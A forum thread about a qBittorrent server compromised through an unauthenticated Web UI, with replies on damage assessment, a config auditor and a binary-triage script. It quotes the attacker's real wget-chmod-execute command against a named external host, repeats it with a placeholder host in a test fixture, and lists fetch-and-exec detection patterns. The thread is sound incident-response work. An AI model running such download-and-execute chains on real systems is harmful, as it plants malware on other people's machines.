Malware installed through qBittorrent?

Associate
Joined
18 Oct 2002
Posts
1,826
Location
Brighton
I have qBittorrent on my server and the webUI has been accessible without authentication. I only use the software very rarely and not for anything “dodgy”, so I never saw the need for authentication until today, when I got a random notification that it had just finished downloading something that I hadn’t asked for. The log below tells the story:

[image: screenshot of the qBittorrent log]

It would seem that someone has logged in, changed the options so that a command is run upon completion of a download, started a tiny download which then completes (the command is run), removed the download and removed the amended settings.

The command is:
sh -c "/bin/rm -rf $HOME/srunner;wget -P $HOME/ http://vps.daswf852.pw/srunner;chmod a+x $HOME/srunner;$HOME/srunner"

Any idea what damage might have been done?

Obviously I have since corrected my stupidity and removed access to the webUI.

EDIT - the server is running Windows 10; the command looks to me like a Linux one, so hopefully it has done nothing...?!

Thanks in advance.
 
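The sequence described above (change the run-on-completion hook, trigger a download, tidy up) leaves traces in qBittorrent's settings while it is in place, and the two preconditions (an unauthenticated Web UI and an autorun command that fetches and executes something) can be checked for in the config file. The following is an added example, not code from this thread or from the qBittorrent project. It assumes the ini section and key names used by qBittorrent 4.x (`[AutoRun]` `enabled`/`program`, `[Preferences]` `WebUI\Enabled`, `WebUI\Address`, `WebUI\LocalHostAuth`, `WebUI\AuthSubnetWhitelistEnabled`, `WebUI\AuthSubnetWhitelist`); confirm them against your own file. `SAMPLE_INI`, `HARDENED_INI` and the `example.invalid` URL are constructed inputs.

```python
"""Audit a qBittorrent.ini for the settings abused in this thread.

Added example, not qBittorrent's own code.  The section and key names below
are assumptions taken from qBittorrent 4.x ini files; confirm them against
your own file.  SAMPLE_INI and HARDENED_INI are constructed inputs.
"""
import configparser
import ipaddress
import re
from dataclasses import dataclass

# Fetch tools and "make it runnable" idioms that do not belong in a
# post-download hook you did not write yourself.
_FETCH = re.compile(r"\b(wget|curl|certutil|bitsadmin|Invoke-WebRequest|iwr)\b|https?://", re.I)
_EXEC = re.compile(r"chmod\s+[ugoa]*\+x|^(ba|da)?sh\b|\bpowershell\b.*\s-e(nc|ncodedcommand)?\b", re.I)


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    key: str        # setting that triggered the finding
    detail: str


def _truthy(value):
    return value.strip().strip('"').lower() in ("true", "1", "yes")


def _split_steps(command):
    """Split a one-liner on ; && || | so each step is judged on its own."""
    return [s for s in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command.strip()) if s]


def _is_wide(net):
    """A whitelist entry shorter than /8 (or unparsable) is treated as wide open."""
    try:
        return ipaddress.ip_network(net, strict=False).prefixlen < 8
    except ValueError:
        return True


def audit_autorun(cp):
    if not _truthy(cp.get("AutoRun", "enabled", fallback="false")):
        return []
    program = cp.get("AutoRun", "program", fallback="").strip().strip('"')
    if not program:
        return []
    steps = _split_steps(program)
    fetch = [s for s in steps if _FETCH.search(s)]
    execs = [s for s in steps if _EXEC.search(s)]
    if fetch and execs:
        return [Finding("high", "AutoRun\\program",
                        f"download-and-execute chain ({len(steps)} steps): fetch={fetch[0]!r}, exec={execs[0]!r}")]
    if fetch or execs:
        return [Finding("medium", "AutoRun\\program",
                        "hook fetches from the network or makes files executable; review it")]
    return [Finding("medium", "AutoRun\\program",
                    f"run-on-completion hook is enabled ({program!r}); confirm you set it")]


def audit_webui(cp):
    sec, findings = "Preferences", []
    if not _truthy(cp.get(sec, r"WebUI\Enabled", fallback="false")):
        return findings
    address = cp.get(sec, r"WebUI\Address", fallback="*").strip()
    if address in ("*", "0.0.0.0", "::"):
        findings.append(Finding("medium", r"WebUI\Address",
                                f"Web UI listens on every interface ({address}); a port forward exposes it to the internet"))
    if not _truthy(cp.get(sec, r"WebUI\LocalHostAuth", fallback="true")):
        findings.append(Finding("medium", r"WebUI\LocalHostAuth",
                                "no password asked of localhost clients, so any local process can change settings"))
    if _truthy(cp.get(sec, r"WebUI\AuthSubnetWhitelistEnabled", fallback="false")):
        nets = [n.strip() for n in cp.get(sec, r"WebUI\AuthSubnetWhitelist", fallback="").split(",") if n.strip()]
        wide = [n for n in nets if _is_wide(n)]
        findings.append(Finding("high" if wide else "medium", r"WebUI\AuthSubnetWhitelist",
                                f"password bypassed for {nets}" + (f"; {wide} is effectively the whole internet" if wide else "")))
    return findings


def audit_qbittorrent_ini(text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str           # qBittorrent keys are case-sensitive (WebUI\Enabled)
    cp.read_string(text)
    return audit_autorun(cp) + audit_webui(cp)


# Constructed ini mirroring the thread's scenario (placeholder URL, not the real one).
SAMPLE_INI = r"""[AutoRun]
enabled=true
program=sh -c "/bin/rm -rf $HOME/srunner;wget -P $HOME/ http://example.invalid/srunner;chmod a+x $HOME/srunner;$HOME/srunner"

[Preferences]
WebUI\Enabled=true
WebUI\Address=*
WebUI\Port=8080
WebUI\LocalHostAuth=false
WebUI\AuthSubnetWhitelistEnabled=true
WebUI\AuthSubnetWhitelist=0.0.0.0/0
"""

# Constructed ini with the hook off and the Web UI bound to loopback, password required.
HARDENED_INI = r"""[AutoRun]
enabled=false
program=

[Preferences]
WebUI\Enabled=true
WebUI\Address=127.0.0.1
WebUI\Port=8080
WebUI\LocalHostAuth=true
WebUI\AuthSubnetWhitelistEnabled=false
"""

if __name__ == "__main__":
    for f in audit_qbittorrent_ini(SAMPLE_INI):
        print(f.severity.upper(), f.key, "-", f.detail)
    print("hardened:", audit_qbittorrent_ini(HARDENED_INI))
```

Run it against a copy of the live ini (on Windows it lives under %APPDATA%\qBittorrent) while the client is closed, since the Web UI attacker in this thread removed the hook again after use; only a snapshot taken while the hook is set, or a file-change alert on the ini, will catch it.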
Soldato
Joined
18 May 2010
Posts
22,372
Location
London
It looked like it downloaded and executed a script.

srunner is the name of the script it ran.

Does this exist on your server: $HOME/srunner ?

$HOME will be the name of the current user at the time the command was run.

If it was me I would be doing a reformat and reinstall of your server just to be on the safe side.

Did you have anything valuable on the server, that they could steal?

What you could do in a temporary linux VM is wget this http://vps.daswf852.pw/srunner and then cat the file.

That will tell you what it did. Don't make the file executable tho. All you want to do is read it.

So:

cd /var/tmp
wget http://vps.daswf852.pw/srunner
cat srunner

I did a quick Google for srunner but I can't figure out what it is. It seems to be something related to embedded devices. I do hope that means they haven't installed a rootkit on the system.
 
Associate
OP
Joined
18 Oct 2002
Posts
1,826
Location
Brighton
Thanks for the replies.

The server doesn't have much of importance on it, mostly photos, videos and so on.

I'm probably exposing my ignorance, but as my server is running Windows, can the script be executed at all if it's not a Linux system?
 
Associate
Joined
4 Dec 2009
Posts
518
I've not heard of it, so I guess not!
Security is not really on your list of priorities, is it?

You had the web gui on a torrent client open to the internet.
You had no password.
You're now assuming because you haven't heard of something it is not installed.

This is a Windows 10 box. MS installs tonnes of random stuff you will never use.

That log you posted reported no error messages at all.
You have no idea if the script ran. If it did you have no idea what it did.
Its name is irrelevant, as is the URL it's hosted at. Both are random and temporary in order to not be trackable.
It's most likely called srunner so it can pretend to be something it is not.

Close that port on your router.
Close any other ports you do not have secured.
Format the PC.
Use a different torrent client and don't enable the web facing gui.

If you have used that PC to fill in any UN/PW on any websites those credentials need to be changed as do any email accounts you had setup on there.
 
Soldato
Joined
4 Nov 2006
Posts
2,944
Location
London
Looks like an exploit/security flaw in qBittorrent. However since you're running a Windows version it'll have done nothing. I downloaded the file and it looks like an ELF binary (Linux executable).
The commands separated by the semicolon were just multi-line commands, so it looks like it would delete an existing srunner program, download a new one to the same location, mark it as executable and then run it.

Just secure your client or change torrent client. I'd be tempted to report it to the qBittorrent devs as well so they can investigate how it could have happened.
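The earlier suggestion to fetch the file in a throwaway VM and just read it, and moogle's identification of it as an ELF binary, both come down to inspecting bytes without executing anything. As an added example (not code from this thread or from any project mentioned in it), here is a small Python triage that does that more usefully than `cat`: it hashes the blob, recognises ELF, PE and script magic, and for ELF reads the header fields that tell you what the sample was built for, which is where the "embedded devices" hint would show up as an ARM or MIPS `e_machine`. The ELF headers, `PE_SAMPLE` and `SCRIPT_SAMPLE` at the bottom are constructed test inputs, not the real srunner file.

```python
"""Triage a downloaded file by inspecting its bytes, never by running it.

Added example, not code from this thread.  The samples at the bottom are
constructed headers, not the real srunner binary.
"""
import hashlib
import struct

ELF_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
ELF_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64", 243: "RISC-V"}


def parse_elf_header(data):
    """Return the header fields a responder cares about, or None if not a full ELF header."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None                      # malformed e_ident: do not trust the rest
    bits = 32 if ei_class == 1 else 64
    if bits == 64 and len(data) < 64:
        return None
    end = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(end + "HH", data, 16)
    # e_entry sits at offset 24 in both layouts; only its width differs.
    (e_entry,) = struct.unpack_from(end + ("I" if bits == 32 else "Q"), data, 24)
    return {
        "bits": bits,
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, f"unknown({e_type})"),
        "machine": ELF_MACHINES.get(e_machine, f"unknown({e_machine})"),
        "entry": e_entry,
    }


def triage(data):
    """Classify a blob by its magic bytes and return a summary dict (never executes it)."""
    summary = {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}
    elf = parse_elf_header(data)
    if elf:
        summary.update(kind="ELF", **elf)
    elif data[:2] == b"MZ":
        summary["kind"] = "PE/Windows"
    elif data[:2] == b"#!":
        first = data.split(b"\n", 1)[0].decode("ascii", "replace")
        summary.update(kind="script", interpreter=first[2:].strip())
    elif data[:4] == b"\x7fELF":
        summary["kind"] = "ELF (truncated or malformed header)"
    else:
        summary["kind"] = "unknown"
    return summary


# Constructed 64-byte ELF64 header: little-endian, ET_EXEC, EM_X86_64, entry 0x401000.
ELF64_SAMPLE = struct.pack("<4sBBBBB7sHHIQQQIHHHHHH", b"\x7fELF", 2, 1, 1, 0, 0, b"\0" * 7,
                           2, 62, 1, 0x401000, 64, 0, 0, 64, 56, 0, 64, 0, 0)
# Constructed 52-byte ELF32 header: little-endian, ET_EXEC, EM_ARM, entry 0x8000.
ELF32_ARM_SAMPLE = struct.pack("<4sBBBBB7sHHIIIIIHHHHHH", b"\x7fELF", 1, 1, 1, 0, 0, b"\0" * 7,
                               2, 40, 1, 0x8000, 52, 0, 0, 52, 32, 0, 40, 0, 0)
PE_SAMPLE = b"MZ" + b"\0" * 62                      # constructed DOS stub start
SCRIPT_SAMPLE = b"#!/bin/sh\necho constructed sample\n"  # constructed, harmless

if __name__ == "__main__":
    for name, blob in [("elf64", ELF64_SAMPLE), ("elf32-arm", ELF32_ARM_SAMPLE),
                       ("pe", PE_SAMPLE), ("script", SCRIPT_SAMPLE)]:
        print(name, triage(blob))
```

Replace the constructed samples with `open(path, "rb").read()` on the fetched file; the SHA-256 is what you would look up in a malware database, and the `machine` field settles whether the binary could ever have run on the host it was dropped on.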
 
Associate
OP
Joined
18 Oct 2002
Posts
1,826
Location
Brighton
> Looks like an exploit/security flaw in qBittorrent. However since you're running a Windows version it'll have done nothing. I downloaded the file and it looks like an ELF binary (Linux executable).
> The commands separated by the semicolon were just multi-line commands, so it looks like it would delete an existing srunner program, download a new one to the same location, mark it as executable and then run it.
>
> Just secure your client or change torrent client. I'd be tempted to report it to the qBittorrent devs as well so they can investigate how it could have happened.

Thanks moogle. I’d come to the same conclusion, although I hadn’t got as far as examining the file in any detail.

I’m not sure there’s much to report to the devs as it’s not really a fault in the software, just that I was daft enough not to password protect its UI.

I’ve secured the client and given myself a good telling-off.
 
Soldato
Joined
25 Oct 2002
Posts
2,622
I think you're making two mistakes here.
  1. You've exposed a service to the internet without putting it behind strong authentication or a VPN.
  2. You're assuming that what you see in that log is everything the person that accessed the system was able to do. (i.e. if one person accessed it, what's to say more savvy people hadn't previously accessed it but covered their tracks by editing the logs)
You have a system you know has been accessed remotely at least once, the only sensible thing to do is to rebuild it.
 
Soldato
Joined
29 Dec 2009
Posts
7,174
> I think you're making two mistakes here.
>   1. You've exposed a service to the internet without putting it behind strong authentication or a VPN.
>   2. You're assuming that what you see in that log is everything the person that accessed the system was able to do. (i.e. if one person accessed it, what's to say more savvy people hadn't previously accessed it but covered their tracks by editing the logs)
> You have a system you know has been accessed remotely at least once, the only sensible thing to do is to rebuild it.

This.

http://vps.daswf852.pw/

https://github.com/Daswf852
https://www.reddit.com/user/daswf852/

Maybe you could ask them what it does :p
 